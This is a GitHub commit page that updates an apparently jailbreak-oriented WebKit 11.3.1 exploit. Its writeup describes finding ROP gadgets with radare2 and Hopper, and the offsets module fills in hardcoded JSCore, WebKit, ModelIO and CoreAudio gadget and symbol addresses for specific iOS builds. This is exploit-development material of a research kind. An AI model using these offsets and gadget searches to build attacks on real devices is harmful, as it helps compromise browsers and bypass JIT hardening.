Skip to content

Commit

Permalink
improved writeup
Browse files Browse the repository at this point in the history
  • Loading branch information
MTJailed committed Jun 23, 2018
1 parent e1ec1a6 commit 92f3d1a
Showing 2 changed files with 10 additions and 15 deletions.
16 changes: 8 additions & 8 deletions DOCS/Webkit-11.3.1-Writeup.md
Original file line number Diff line number Diff line change
@@ -17,16 +17,16 @@ Therefore the following methods can be used for finding offsets for the exploit
The first option would be more straightforward as it only gives you the libraries you need but at this time my program as I wrote it is only able to dump the TEXT section from the libraries. You can find the code in UnjailMe.

The second option is what I did but that comes with a limitation:
- There are currently no working and precise cache extraction utillities that do not truncate or corrupt the libraries.
- Loading an entire cache (1GB) into IDA will be extremely slow
- Radare2 will load it but the analysis will take ages and its not efficient to analyze the entire cache
- Hopper will load it and you can select the library to analyze but hopper does not have very good ROP gadget search functionality other than poorly searching for opcodes.

So finding the symbol offsets is easy with hopper.
- ~~There are currently no working and precise cache extraction utillities that do not truncate or corrupt the libraries.~~
- Loading an entire cache (1GB) into IDA will be extremely slow so it needs to be extracted.
- Radare2 can be used to find the ROP gadgets
- My offset finder can find the offsets of the needed symbols on-device, otherwise hopper can be used.

Take a look at offsets.module.js and there you can see which offsets to find.

But then there are the ROP gadgets and those may take ages to find manually in Hopper.

Until either a new cache extraction utilty is written or my iOS app for dumping libraries is finished looking for ROP gadgets will be a painful job.
To find the popx8 gadget in ModelIO use the followin in radare2:
```radare2
"/c ldr x8, [sp, 0x28]; ldr x0, [x8, 0x18]; ldp x29, x30, [sp, 0x50]; add sp, sp, 0x60; ret"
```

9 changes: 2 additions & 7 deletions modules/offsets.module.js
Original file line number Diff line number Diff line change
@@ -35,7 +35,7 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b31a10c8, //From JSCore
usefastpermissions_jitcopy: 0x1b1bf0018, //From JSCore (JIT hardening)
ptr_stack_check_guard: 0x1ac2f7c40, //From JSCore
modelio_popx8: 0, //From ModelIO
modelio_popx8: 0x18d2f6574, //From ModelIO
// ldr x8, [sp, #0x28]
// ldr x0, [x8, #0x18]
// ldp x29, x30, [sp, #0x50]
@@ -64,12 +64,7 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b335d0c8, //From Webkit
usefastpermissions_jitcopy: 0x1b1d04018, //From Webkit (JIT hardening)
ptr_stack_check_guard: 0x1ac3efc40, //From Webkit
modelio_popx8: 0x18d2f6564, //From ModelIO
// ldr x8, [sp, #0x28]
// ldr x0, [x8, #0x18]
// ldp x29, x30, [sp, #0x50]
// add sp, sp, #0x60
// ret
modelio_popx8: 0x18d2f6564, //Use radare: "/c ldr x8, [sp, 0x28]; ldr x0, [x8, 0x18]; ldp x29, x30, [sp, 0x50]; add sp, sp, 0x60; ret"
coreaudio_popx2: 0x18409ddbc, //From CoreAudio
// ldr x2, [sp, #8]
// mov x0, x2

0 comments on commit 92f3d1a

Please sign in to comment.